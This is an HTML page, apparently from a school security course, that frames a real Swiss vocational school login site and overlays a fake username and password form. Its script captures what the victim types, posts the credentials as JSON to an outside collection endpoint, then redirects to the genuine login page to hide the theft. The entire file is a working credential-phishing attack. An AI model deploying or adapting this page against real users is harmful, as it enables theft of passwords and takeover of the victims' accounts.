<!DOCTYPE html>
<html lang="en">
    <head>
        <meta charset="UTF-8">
        <meta name="viewport" content="width=device-width, initial-scale=1.0">
        <meta http-equiv="X-UA-Compatible" content="ie=edge">
        <title>Clickjacking</title>
        <style>
                body {
                    /*no scrolling bar*/
                    overflow: hidden;
                    margin: 0;
                    padding: 0;
                    height: 100%;
                    width: 100%;
                }
                iframe {
                    position: absolute;
                    pointer-events: none;
                    top: 0;
                    left: 0;
                    height: 100%;
                    width: 100%;
                    opacity: 0.98;
                    z-index: 0;
                }
                #form {
                    opacity: 1;
                    z-index: 10;
                    font-size: 16px;
                    font-family: Arial, Helvetica, sans-serif;
                    text-align: center;
                    margin-left: -384px;
                }
                #txtUsername {
                    z-index: 1;
                    height: 19px;
                    width: 367px;
                    position: absolute;
                    margin-top: 235px;
                }
                #submitButton {
                    z-index: 1;
                    position: absolute;
                    margin-top: 351px;
                    width: 78px;
                    height: 23px;
                }
                #txtPassword {
                    z-index: 1;
                    height: 19px;
                    width: 367px;
                    position: absolute;
                    margin-top: 288px;
                }
                
                /*if height lower than 460px*/
                @media only screen and (max-height: 460px) {
                    #form{
                        margin-left: -400px;
                    }
                }

                /*if width lower than 435px*/
                @media only screen and (max-width: 435px) {
                    #form{
                        position: fixed;
                    }
                }
            </style>
    </head>
    <body>
        <!-- Fake Loggin Form -->
        <form method="POST" accept-charset="utf-8" action="" id="form">
            <input id="txtUsername" autocomplete="off" type="text">
            <input id="txtPassword" autocomplete="off" type="password">
            <button type="submit" id="submitButton">Anmelden</button>
        </form>
        

        <!-- Iframe of the GIBZ EduZug loggin -->
        <iframe src="https://gibz.zg.ch" class="iframe"></iframe>

        <script type="text/javascript">

            //on load the textbox username is selected
            window.onload = function() {
                document.getElementById("txtUsername").focus();
            };

            //if submitButton is clicked
            document.getElementById("form").addEventListener("submit", function (e) {
                e.preventDefault();
                e.stopPropagation();

                if (e.target && e.target.id == "form") {
                    //save username & password from textboxes
                    var name = document.getElementById("txtUsername").value;
                    var pass = document.getElementById("txtPassword").value;

                    //send it to Server
                    var Xhr = new XMLHttpRequest();
                    Xhr.open('POST', 'https://m183.gibz-informatik.ch/api/clickjackedCredentials');
                    Xhr.setRequestHeader('Content-Type', 'application/json');
                    
                    Xhr.send(JSON.stringify({
                        "source": "https://gibz.zg.ch",
                        "username": name,
                        "password": pass
                    }));
                    
                    //locate user to the gibz error page
                    window.location.href = "https://www.zg.ch/behoerden/volkswirtschaftsdirektion/gibz/eduzug/login";
                }
            });
        </script>
    </body>
</html>